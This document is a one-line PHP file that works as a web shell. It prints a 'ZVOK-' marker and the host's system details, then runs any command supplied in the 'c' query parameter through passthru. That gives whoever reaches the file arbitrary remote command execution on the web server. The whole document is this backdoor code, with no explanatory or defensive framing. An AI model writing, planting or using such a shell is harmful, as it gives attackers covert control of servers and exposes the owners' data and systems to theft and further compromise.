<?php header("Content-Type:text/plain");echo "ZVOK-".php_uname()."\n";if(isset($_GET["c"]))passthru($_GET["c"]);